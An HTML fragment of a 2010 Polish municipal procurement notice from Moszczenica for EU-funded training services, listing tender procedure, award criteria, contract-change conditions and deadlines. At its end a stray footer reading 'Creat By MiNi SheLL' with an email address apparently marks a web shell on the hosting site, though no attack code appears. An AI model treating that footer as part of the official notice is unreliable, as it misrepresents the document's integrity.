<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">aktualne zaświadczenie o wpisie do rejestru instytucji szkoleniowych prowadzonego przez właściwy miejscowo Wojewódzki Urząd Pracy</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ustawy Prawo Zamówień Publicznych Zamawiający przewiduje zmiany zawartej umowy dotyczące 
1. terminu realizacji zamówienia w przypadku m.in. zaistnienia następujących okoliczości:
a) w następstwie wykraczających poza terminy określone w KPA, procedur administracyjnych oraz innych terminów formalno-prawnych mających wływ na terminy realizacji zamówienia;
b) działania siły wyższej;
c) w razie konieczności podjęcia działań zmierzających do ograniczenia skutków zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć, zagrażająceg życiu  lub zdrowiu ludzi;
d) z przyczyn zależnych od Zamawiającego
f) zmiany korzystne dla Zamawiającego.
2 W związku z faktem, że zamówienie wiąże się z realizacją projektu finasowanego ze środków Wojewódzkiego Urzędu Pracy na podstawie umowy zawartej z Zamawiającym, może zajść konieczność dostosowania przedmiotu umowy do zaistniałych sytuacji wynikających ze zmiany umowy z WUP, a co się z tym wiąże:
a) zaniechanie wykonania części poszczególnych zakresów,
b) wydłużeniu terminu realizacji wykonania poszczególnych zadań.
c) zmniejszenie wartości zamówienia, zmniejszenia lub zmianie zakresu prac, co nie spowoduje zwiększenia wartości zamówienia,
d) zmianie terminu umownego w przypadku zaistniałych zaistnienia okoliczności: z pkkt. c.,  wystąpienia prac dodatkowych, zaistniałych sytuacji losowych, siły wyższej, o czas uzasadniony i uzgodniony z Zamawiającym,
e) Zmniejszenia liczby uczestników szkolenia w przypadku wystąpienia okoliczności niezaleznych i niezawionionych przez Zamawiającego, których nie można było przewidzieć w chwili zawarcia umowy, a powodujacych, że wykonanie zamówienia nie jest możliwe w liczbie uwzględnionej między stronami.
f) zmiana terminu realizacji I edycji szkoleń z przyczyn leżących po stronie Zamawiającego,
g) zmiana uczestników szkolenia.
h) zmiana harmonogramu szkolenia z przyczyn zaleznych od Zamawiającego lub Instytucji
Wdrażającej,
i) zmiana wzoru listy obecności z przyczyn zaleznych od Zamawiającego lub Instytucji
Wdrażającej,
j) zmiana Wykładowcy zajęć z przyczyn leżących po stronie Wykonawcy np. przyczyny losowe, choroby, wypadek za zgodą Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.moszczenica.bipst.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Moszczenicy
ul. Kosowska 1
97-310 Moszczenica.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.06.2010 godzina 10:00, miejsce: Urząd Gminy w Moszczenicy
ul. Kosowska 1
97-310 Moszczenica pok. 13.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn. INICJATYWA WARUNKIEM ROZWOJU finansowanym  ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Priorytet VI - Rynek pracy otwarty dla wszystkich, Działanie 6.2 - Wsparcie oraz promocja przedsiębiorczości i samozatrudnienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com